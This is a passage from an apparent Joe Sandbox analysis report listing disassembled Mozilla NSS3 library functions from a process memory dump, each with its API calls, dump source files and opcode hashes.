                                                                        • CERT_CheckNameSpace.NSS3(?,00000000,00000000), ref: 6CB17DB8
                                                                        • PR_SetError.NSS3(FFFFE023,00000000), ref: 6CB17E19
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Util$CurrentEqual_ErrorItem_ItemsThread$ArenaCheckCompareCopyFindMark_NameSpaceTag_Valuefreememcmp
                                                                        • String ID:
                                                                        • API String ID: 70581797-0
                                                                        • Opcode ID: 77e2f000531ea7da971b099ba44b0a33d9a6cad3749684bcf2adbb6b7db5e4e9
                                                                        • Instruction ID: 9bde9c95ae16a045f8f1dc93cca8520c347f613d99f821b76ea1c9f33467b78a
                                                                        • Opcode Fuzzy Hash: 77e2f000531ea7da971b099ba44b0a33d9a6cad3749684bcf2adbb6b7db5e4e9
                                                                        • Instruction Fuzzy Hash: A541D3B2A141AA9BDB008F69DC41BAF33A8EF4425CF150064EC19B7E51EB70E915C7E2
                                                                        Function 6CB73CA0 Relevance: 13.6, APIs: 9, Instructions: 90memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,-00000001,?,00000000,?,6CB738BD), ref: 6CB73CBE
                                                                        • PORT_Alloc_Util.NSS3(00000000,?,000000FF,00000000,00000000,?,-00000001,?,00000000,?,6CB738BD), ref: 6CB73CD1
                                                                          • Part of subcall function 6CB70BE0: malloc.MOZGLUE(6CB68D2D,?,00000000,?), ref: 6CB70BF8
                                                                          • Part of subcall function 6CB70BE0: TlsGetValue.KERNEL32(6CB68D2D,?,00000000,?), ref: 6CB70C15
                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,6CB738BD), ref: 6CB73CF0
                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6CC4B369,000000FF,00000000,00000000,?,000000FF,00000000,00000000,6CB738BD), ref: 6CB73D0B
                                                                        • PORT_Alloc_Util.NSS3(00000000,?,000000FF,00000000,00000000,6CB738BD), ref: 6CB73D1A
                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6CC4B369,000000FF,00000000,00000000,00000000,6CB738BD), ref: 6CB73D38
                                                                        • _wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000), ref: 6CB73D47
                                                                        • free.MOZGLUE(00000000), ref: 6CB73D62
                                                                        • free.MOZGLUE(000000FF,?,000000FF,00000000,00000000,6CB738BD), ref: 6CB73D6F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$Alloc_Utilfree$Value_wfopenmalloc
                                                                        • String ID:
                                                                        • API String ID: 2345246809-0
                                                                        • Opcode ID: 009d11524afbd479a1d75903eab9588ac6108be7ca1d681a756061bd90fdf2c2
                                                                        • Instruction ID: 2cd78458a92a22ef2cce83de26ededfbc7c7a22195ff394ae7b18e28c467de99
                                                                        • Opcode Fuzzy Hash: 009d11524afbd479a1d75903eab9588ac6108be7ca1d681a756061bd90fdf2c2
                                                                        • Instruction Fuzzy Hash: D42195B57011A27BFF30667B5D09E7B35ACDB826A8B140235BD39D76C0EB60C8008372
                                                                        Function 6CB74DF0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 184memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6CB7536F,00000022,?,?,00000000,?), ref: 6CB74E70
                                                                        • PORT_ZAlloc_Util.NSS3(00000000), ref: 6CB74F28
                                                                        • PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6CB74F8E
                                                                        • PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6CB74FAE
                                                                        • free.MOZGLUE(?), ref: 6CB74FC8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: R_smprintf$Alloc_Utilfreeisspace
                                                                        • String ID: %s=%c%s%c$%s=%s
                                                                        • API String ID: 2709355791-2032576422
                                                                        • Opcode ID: cf6e7fafaeada6656f5faaae2c8506bcd1e6ee49a415a0e5e5e5ecdbf7ccb5d5
                                                                        • Instruction ID: 8fb45be9c2b14a88e9c0e859eb43492b475de117d636cf8e2e951b6b283a6fc6
                                                                        • Opcode Fuzzy Hash: cf6e7fafaeada6656f5faaae2c8506bcd1e6ee49a415a0e5e5e5ecdbf7ccb5d5
                                                                        • Instruction Fuzzy Hash: 60513621A041C58BEF25CA6E84907FF7BF5DF4631AF188125ECB4ABA40D33588458FB2
                                                                        Function 6CA9FCF0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 155COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124AC,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA9FD7A
                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA9FD94
                                                                        • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124BF,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA9FE3C
                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA9FE83
                                                                          • Part of subcall function 6CA9FEC0: memcmp.VCRUNTIME140(?,?,?,?,00000000,?), ref: 6CA9FEFA
                                                                          • Part of subcall function 6CA9FEC0: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,?), ref: 6CA9FF3B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: _byteswap_ulongsqlite3_log$memcmpmemcpy
                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                        • API String ID: 1169254434-598938438
                                                                        • Opcode ID: ff9e74f254c04c4707b8c60f28543b4c4ba81697562fb449254a26acd80c9ce2
                                                                        • Instruction ID: 9371ccdb6b528d4bd78a5475a39fc4538dae07d3701b96c9ca69b5f22b4e8e5d
                                                                        • Opcode Fuzzy Hash: ff9e74f254c04c4707b8c60f28543b4c4ba81697562fb449254a26acd80c9ce2
                                                                        • Instruction Fuzzy Hash: AA516D75A002059FDF04CFA9C991AAEB7F1EF48308F18406DE905AB756E735EC94CBA0
                                                                        Function 6CB28CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • TlsGetValue.KERNEL32(00000000,00000000,?,6CB3124D,00000001), ref: 6CB28D19
                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,6CB3124D,00000001), ref: 6CB28D32
                                                                        • PL_ArenaRelease.NSS3(?,?,?,?,?,6CB3124D,00000001), ref: 6CB28D73
                                                                        • PR_Unlock.NSS3(?,?,?,?,?,6CB3124D,00000001), ref: 6CB28D8C
                                                                          • Part of subcall function 6CBBDD70: TlsGetValue.KERNEL32 ref: 6CBBDD8C
                                                                          • Part of subcall function 6CBBDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CBBDDB4
                                                                        • PR_Unlock.NSS3(?,?,?,?,?,6CB3124D,00000001), ref: 6CB28DBA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
                                                                        • String ID: KRAM$KRAM
                                                                        • API String ID: 2419422920-169145855
                                                                        • Opcode ID: 503138643ce0661d52b8ddf5b2c0168b2f95ef08a3d380237b7a4d57f23fb439
                                                                        • Instruction ID: d642e9aade5128dc8a5edf71479d5560e122574bcfcda2bf85f8b4ee070dc9d5
                                                                        • Opcode Fuzzy Hash: 503138643ce0661d52b8ddf5b2c0168b2f95ef08a3d380237b7a4d57f23fb439
                                                                        • Instruction Fuzzy Hash: 5B217EB6A046518FCB00EF39C48456EBBF0FF55348F15896ED89887705DB39D845CB92
                                                                        Function 6CB4ACC0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 76COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6CB4ACE6
                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB4AD14
                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB4AD23
                                                                          • Part of subcall function 6CC2D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC2D963
                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6CB4AD39
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: L_strncpyzPrint$L_strcatn
                                                                        • String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal
                                                                        • API String ID: 332880674-3521875567
                                                                        • Opcode ID: 993027f5e172773a96eda0551c7ea28c580efdf931808a819bc9996f457ca7f7
                                                                        • Instruction ID: 6ea4fe85eccaee6ccda34028dc58753c02b0d4d295008050eb0a906b7788d3dd
                                                                        • Opcode Fuzzy Hash: 993027f5e172773a96eda0551c7ea28c580efdf931808a819bc9996f457ca7f7
                                                                        • Instruction Fuzzy Hash: C82129307051B4DFDB01AB64DD98BAE3775EB4631EF048035E40997A15EB349C49DBB2
                                                                        Function 6CBE4D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CBE4DC3
                                                                        • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CBE4DE0
                                                                        Strings
                                                                        • API call with %s database connection pointer, xrefs: 6CBE4DBD
                                                                        • %s at line %d of [%.10s], xrefs: 6CBE4DDA
                                                                        • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CBE4DCB
                                                                        • misuse, xrefs: 6CBE4DD5
                                                                        • invalid, xrefs: 6CBE4DB8
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: sqlite3_log
                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                        • API String ID: 632333372-2974027950
                                                                        • Opcode ID: e20c7dfae6b79785e26594eccc439eb62da8e85838b9bfbe358df232e33c86c3
                                                                        • Instruction ID: 4b7e3ecbea0430ea47b1295213a8e353c99602834b6c60663acec7cb8a149c5f
                                                                        • Opcode Fuzzy Hash: e20c7dfae6b79785e26594eccc439eb62da8e85838b9bfbe358df232e33c86c3
                                                                        • Instruction Fuzzy Hash: 97F0E931F146B47BD7015196CD10F8637958F0979DF46C9A0FE046BE62E3059CA897C2
                                                                        Function 6CBE4DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CBE4E30
                                                                        • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CBE4E4D
                                                                        Strings
                                                                        • API call with %s database connection pointer, xrefs: 6CBE4E2A
                                                                        • %s at line %d of [%.10s], xrefs: 6CBE4E47
                                                                        • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CBE4E38
                                                                        • misuse, xrefs: 6CBE4E42
                                                                        • invalid, xrefs: 6CBE4E25
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: sqlite3_log
                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                        • API String ID: 632333372-2974027950
                                                                        • Opcode ID: 6d1308687d64ab14008fd98dd43e68736a6e15286aa350c24237fe416774ec20
                                                                        • Instruction ID: 535ad0d21b9ee21fc387d7d500437331fa891cb93df17f8598466f7e7a3b1d83
                                                                        • Opcode Fuzzy Hash: 6d1308687d64ab14008fd98dd43e68736a6e15286aa350c24237fe416774ec20
                                                                        • Instruction Fuzzy Hash: 76F02731F449A87FEA1450A5DD10F823786CF0B7A9F49C5A1FA0867F92E30598B056D3
                                                                        Function 6CB50C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PR_SetError.NSS3(00000000,00000000,6CB51444,?,00000001,?,00000000,00000000,?,?,6CB51444,?,?,00000000,?,?), ref: 6CB50CB3
                                                                          • Part of subcall function 6CBBC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBBC2BF
                                                                        • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CB51444,?,00000001,?,00000000,00000000,?,?,6CB51444,?), ref: 6CB50DC1
                                                                        • PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6CB51444,?,00000001,?,00000000,00000000,?,?,6CB51444,?), ref: 6CB50DEC
                                                                          • Part of subcall function 6CB70F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6CB12AF5,?,?,?,?,?,6CB10A1B,00000000), ref: 6CB70F1A
                                                                          • Part of subcall function 6CB70F10: malloc.MOZGLUE(00000001), ref: 6CB70F30
                                                                          • Part of subcall function 6CB70F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CB70F42
                                                                        • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6CB51444,?,00000001,?,00000000,00000000,?), ref: 6CB50DFF
                                                                        • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6CB51444,?,00000001,?,00000000), ref: 6CB50E16
                                                                        • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6CB51444,?,00000001,?,00000000,00000000,?), ref: 6CB50E53
                                                                        • PR_GetCurrentThread.NSS3(?,?,?,?,6CB51444,?,00000001,?,00000000,00000000,?,?,6CB51444,?,?,00000000), ref: 6CB50E65
                                                                        • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CB51444,?,00000001,?,00000000,00000000,?), ref: 6CB50E79
                                                                          • Part of subcall function 6CB61560: TlsGetValue.KERNEL32(00000000,?,6CB30844,?), ref: 6CB6157A
                                                                          • Part of subcall function 6CB61560: EnterCriticalSection.KERNEL32(?,?,?,6CB30844,?), ref: 6CB6158F
                                                                          • Part of subcall function 6CB61560: PR_Unlock.NSS3(?,?,?,?,6CB30844,?), ref: 6CB615B2
                                                                          • Part of subcall function 6CB2B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6CB31397,00000000,?,6CB2CF93,5B5F5EC0,00000000,?,6CB31397,?), ref: 6CB2B1CB
                                                                          • Part of subcall function 6CB2B1A0: free.MOZGLUE(5B5F5EC0,?,6CB2CF93,5B5F5EC0,00000000,?,6CB31397,?), ref: 6CB2B1D2
                                                                          • Part of subcall function 6CB289E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6CB288AE,-00000008), ref: 6CB28A04
                                                                          • Part of subcall function 6CB289E0: EnterCriticalSection.KERNEL32(?), ref: 6CB28A15
                                                                          • Part of subcall function 6CB289E0: memset.VCRUNTIME140(6CB288AE,00000000,00000132), ref: 6CB28A27
                                                                          • Part of subcall function 6CB289E0: PR_Unlock.NSS3(?), ref: 6CB28A35
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
                                                                        • String ID:
                                                                        • API String ID: 1601681851-0
                                                                        • Opcode ID: 73a3063bb30ff7c61089809906630bcdf7b690b517db464eee862b4735044518
                                                                        • Instruction ID: 219b778dbcac7dd533b5fa99e5fd4d2ca4f1123c05d9f6ab4b37a722153eea92
                                                                        • Opcode Fuzzy Hash: 73a3063bb30ff7c61089809906630bcdf7b690b517db464eee862b4735044518
                                                                        • Instruction Fuzzy Hash: F051A9B6E002905FEB009F64EC41ABF37A8EF4521CF550424EC099B752FB31ED2586A2
                                                                        Function 6CB29C50 Relevance: 12.1, APIs: 8, Instructions: 137COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 6CB28850: calloc.MOZGLUE(00000001,00000028,00000000,?,?,6CB30715), ref: 6CB28859
                                                                          • Part of subcall function 6CB28850: PR_NewLock.NSS3 ref: 6CB28874
                                                                          • Part of subcall function 6CB28850: PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6CB2888D
                                                                        • PR_NewLock.NSS3 ref: 6CB29CAD
                                                                          • Part of subcall function 6CBD98D0: calloc.MOZGLUE(00000001,00000084,6CB00936,00000001,?,6CB0102C), ref: 6CBD98E5
                                                                          • Part of subcall function 6CB007A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA9204A), ref: 6CB007AD
                                                                          • Part of subcall function 6CB007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA9204A), ref: 6CB007CD
                                                                          • Part of subcall function 6CB007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA9204A), ref: 6CB007D6
                                                                          • Part of subcall function 6CB007A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA9204A), ref: 6CB007E4
                                                                          • Part of subcall function 6CB007A0: TlsSetValue.KERNEL32(00000000,?,6CA9204A), ref: 6CB00864
                                                                          • Part of subcall function 6CB007A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CB00880
                                                                          • Part of subcall function 6CB007A0: TlsSetValue.KERNEL32(00000000,?,?,6CA9204A), ref: 6CB008CB
                                                                          • Part of subcall function 6CB007A0: TlsGetValue.KERNEL32(?,?,6CA9204A), ref: 6CB008D7
                                                                          • Part of subcall function 6CB007A0: TlsGetValue.KERNEL32(?,?,6CA9204A), ref: 6CB008FB
                                                                        • TlsGetValue.KERNEL32 ref: 6CB29CE8
                                                                        • EnterCriticalSection.KERNEL32(?,?,6CB2ECEC,6CB32FCD,00000000,?,6CB32FCD,?), ref: 6CB29D01
                                                                        • TlsGetValue.KERNEL32(?,?,?,6CB2ECEC,6CB32FCD,00000000,?,6CB32FCD,?), ref: 6CB29D38
                                                                        • EnterCriticalSection.KERNEL32(?,?,6CB2ECEC,6CB32FCD,00000000,?,6CB32FCD,?), ref: 6CB29D4D
                                                                        • PR_Unlock.NSS3 ref: 6CB29D70
                                                                        • PR_Unlock.NSS3 ref: 6CB29DC3
                                                                        • PR_NewLock.NSS3 ref: 6CB29DDD
                                                                          • Part of subcall function 6CB288D0: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CB30725,00000000,00000058), ref: 6CB28906
                                                                          • Part of subcall function 6CB288D0: EnterCriticalSection.KERNEL32(?), ref: 6CB2891A
                                                                          • Part of subcall function 6CB288D0: PL_ArenaAllocate.NSS3(?,?), ref: 6CB2894A
                                                                          • Part of subcall function 6CB288D0: calloc.MOZGLUE(00000001,6CB3072D,00000000,00000000,00000000,?,6CB30725,00000000,00000058), ref: 6CB28959
                                                                          • Part of subcall function 6CB288D0: memset.VCRUNTIME140(?,00000000,?), ref: 6CB28993
                                                                          • Part of subcall function 6CB288D0: PR_Unlock.NSS3(?), ref: 6CB289AF
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Value$calloc$CriticalEnterLockSectionUnlock$Arena$AllocateInitPoolmemset
                                                                        • String ID:
                                                                        • API String ID: 3394263606-0
